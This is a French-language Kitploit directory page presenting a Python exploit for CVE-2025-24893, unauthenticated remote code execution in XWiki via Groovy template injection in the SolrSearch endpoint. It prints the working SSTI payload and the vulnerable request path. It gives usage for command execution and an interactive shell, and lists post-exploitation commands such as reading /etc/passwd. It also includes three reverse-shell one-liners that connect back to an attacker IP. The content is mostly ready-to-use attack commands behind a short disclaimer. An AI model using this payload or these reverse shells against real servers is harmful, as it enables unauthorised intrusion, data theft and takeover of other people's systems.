Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24893 — Exécution de code à distance non authentifiée dans XWiki via la macro SolrSearch | Kitploit
Outils/GitHubGitHub/gotr00t0day/cve-2025-24893
ExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionRed Teaming
GitHubgotr00t0day/cve-2025-24893

CVE-2025-24893

Exécution de code à distance non authentifiée dans XWiki via la macro SolrSearch

Voir le dépôt
6il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit SSTI XWiki

Un exploit Python pour la vulnérabilité d'injection de modèles côté serveur (SSTI) XWiki via l'injection de modèles Groovy dans le point de terminaison SolrSearch.

Vulnérabilité

  • Type : Injection de modèles côté serveur (SSTI)
  • Composant : Flux RSS XWiki SolrSearch
  • Impact : Exécution de code à distance
  • Version affectée : XWiki 15.10.8 (et potentiellement d'autres)

Prérequis

root@kitploit:~
pip3 install requests beautifulsoup4

Utilisation

Tester la vulnérabilité

root@kitploit:~
./xwiki_exploit.py -u http://target --test

Exécuter une commande unique

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "whoami"
./xwiki_exploit.py -u http://target.com -c "id"
./xwiki_exploit.py -u http://target.com -c "ls -la /tmp"

Shell interactif

root@kitploit:~
./xwiki_exploit.py -u http://target.com

Cela vous donnera un pseudo-shell interactif dans lequel vous pouvez exécuter des commandes :

root@kitploit:~
xwiki> whoami
xwiki
xwiki> pwd
/usr/lib/xwiki-jetty
xwiki> ls /home
oliver
xwiki> exit

Mode débogage

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "id" --debug

Options de la ligne de commande

  • -u, --url URL : URL cible (requis)
  • -c, --command CMD : Exécuter une commande unique
  • --test : Tester si la cible est vulnérable
  • --no-verify-ssl : Désactiver la vérification du certificat SSL
  • --debug : Activer la sortie de débogage

Exemples

Collecte d'informations :

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "uname -a"
./xwiki_exploit.py -u http://target.com -c "cat /etc/os-release"
./xwiki_exploit.py -u http://target.com -c "cat /etc/passwd"

Trouver des fichiers intéressants :

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "find /home -type f -readable 2>/dev/null"
./xwiki_exploit.py -u http://target.com -c "ls -la /var/lib/xwiki"

Informations réseau :

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "ip addr"
./xwiki_exploit.py -u http://target.com -c "netstat -tulpn"

Établir un shell inverse :

root@kitploit:~
# Sur la machine de l'attaquant, démarrer un écouteur :
nc -lvnp 1337

# Depuis l'exploit (essayez différentes méthodes) :
./xwiki_exploit.py -u http://target.com -c "bash -c 'bash -i >& /dev/tcp/IP/1337 0>&1'"
./xwiki_exploit.py -u http://target.com -c "nc -e /bin/sh IP 1337"
./xwiki_exploit.py -u http://target.com -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 1337 >/tmp/f"

Détails techniques

Structure de la charge utile

L'exploit utilise la structure de charge utile SSTI suivante :

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("COMMAND".execute().text){{/groovy}}{{/async}}

Déroulement de l'exploitation

  1. La charge utile est encodée en URL et envoyée au point de terminaison vulnérable :

    root@kitploit:~
    /xwiki/bin/view/Main/SolrSearch?media=rss&text=[PAYLOAD]
    
  2. Le serveur traite le modèle Groovy et exécute la commande

  3. La sortie est capturée depuis la réponse du flux RSS au format :

    root@kitploit:~
    search on [}}OUTPUT]
    
  4. L'exploit analyse la réponse HTML pour extraire la sortie de la commande

Remarques

  • Les commandes sont exécutées avec l'utilisateur xwiki (uid=997)
  • Le répertoire de travail est /usr/lib/xwiki-jetty
  • Certaines commandes peuvent ne pas produire de sortie si elles échouent ou s'exécutent en arrière-plan
  • Pour les commandes complexes, envisagez d'utiliser des scripts shell ou un encodage base64

Avertissement

Cet outil est destiné uniquement à des fins éducatives et de tests de pénétration autorisés. Utilisez-le uniquement sur des systèmes pour lesquels vous avez la permission de tester.

Télécharger l’outil